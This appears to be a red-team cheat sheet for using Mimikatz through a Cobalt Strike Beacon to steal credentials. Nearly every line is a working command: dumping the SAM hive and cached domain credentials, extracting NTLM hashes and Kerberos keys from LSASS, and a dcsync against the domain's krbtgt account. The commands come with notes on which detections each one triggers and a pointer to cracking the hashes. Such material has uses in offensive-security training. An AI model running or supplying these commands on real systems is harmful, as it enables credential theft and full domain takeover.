MimiKatz
Cobalt Strike + MimiKatz
Cobalt Strike's built in Mimikatz executes each new mimikatz command in a new temporary process, which is then destroyed after it finishes. Because of this, we will need to chain our mimikatz commands.
beacon> mimikatz token::elevate ; lsadump::sam
Modifier Keys
!
In most cases, !
is a direct replacement for token::elevate
. For example:
beacon> mimikatz !lsadump::sam
@
The @
impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync.
beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt
Dumping Security Account Manager (SAM)
beacon> mimikatz !lsadump::sam
Note: This opens a handle to the SAM registry Hive. "Suspicious SAM Hive Handle".
Dumping Cached Domain Credentials (DCC)
beacon> mimikatz !lsadump::cache
We can crack the hashes with hashcat. Example hashes can be found here.
Note: This handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle".
Dumping NTLM Hashes
beacon> mimikatz !sekurlsa::logonpasswords
Note: Mimikatz's logonpasswords module will open a read handle to LSASS, which is logged under the winevent 4656. "Suspicious Handle to LSASS". Use this cautiously, and only if needed.
Dumping Kerberos Encryption Keys
beacon> mimikatz !sekurlsa::ekeys
Note: This module also opens a read handle to LSASS.
Last updated